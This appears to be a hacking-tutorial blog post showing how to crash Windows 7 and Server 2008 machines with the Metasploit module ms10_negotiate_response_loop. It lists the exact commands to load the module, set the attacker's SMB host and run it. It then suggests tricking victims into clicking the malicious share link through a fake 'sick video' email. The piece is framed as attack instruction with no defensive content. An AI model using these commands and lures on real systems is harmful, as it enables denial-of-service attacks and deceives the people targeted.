In my first few articles, we focused on operating system hacks. These hacks have been primarily on older operating systems such as Windows XP, Windows Vista, and Windows Server 2003.
Although these operating systems were first released, in some cases, almost 10 years ago, they are still in wide use. I have done consulting to many large corporations and institutions and am always surprised to see Windows XP systems still being used. On the other, I'm never surprised to see Windows Server 2003, as server operating systems get upgraded much less often.
Operating system hacks can be fun, especially when they come at the expense of that software behemoth Microsoft, but they are becoming increasingly rare as Microsoft pays more attention to security. That is one of the reasons that more and more attacks are centered upon the client-side application software instead of the OS.
Before we move on to client-side application hacks, I want to do at least one more operating system hack. Vulnerabilities still exist in the new operating systems, but they are becoming rarer and rarer. With so many vulnerabilities in client-side applications, why would you want to spend a lot of time on the OS?
In this hack, we will take advantage of a flaw in Windows 7 and Windows Server 2008 operating systems that will create an infinite loop and crash the system. Although this isn't nearly as much fun as owning the system, it can be very destructive to an institution that relies upon this system to run their organization.
Enough talk, let's get started. Fire up your Metasploit on Back Track 5 and let's hack! If you're new to Metasploit, check out my article on getting started with it, as well as some of the past hacks.
Remember that Metasploit has six types of modules, exploits, payloads, auxiliary, encoders, NOPs and post. In this hack, we will use an auxiliary module to attack the Windows 7 or Windows Server 2008 system's SMB.
msf> use auxiliary/dos/windows/smb/ms10_negotiate_response_loop
Now that we have selected our module, let's look at our options:
msf> auxiliary(ms10_negotiate_response_loop) show options
As we can see in the screenshot below, the only option we need to set is SVRHOST, which is our—the attacker's—system. In my case, it is 192.168.1.100. Yours may be different; check your IP address by typing ifconfig in a terminal.
Next, set your SVRHOST by typing:
msf > auxiliary(ms10_negotiate_response_loop) set SVRHOST 192.168.1.100
In the last step, we run the auxiliary module and once the module executes, it generates a shared folder link which you can send to the target machine. In this case, the link is \\192.168.1.100\Shared\Anything.
msf > auxiliary(ms10_negotiate_response_loop) run
Metasploit then starts the malicious SMB service and when the target clicks on the link, the target system will begin to run an infinite loop, freeze, and crash.
To make the link look safe and more inviting, we might try crafting a webpage and attaching this link to it. Sending this link with an email that says something like "Hey, check out this sick video!" When the victim clicks on the link to view the "video", their system crashes.
In my next few hacks, we will start looking at attacking the many vulnerable client-side applications. Happy hacking!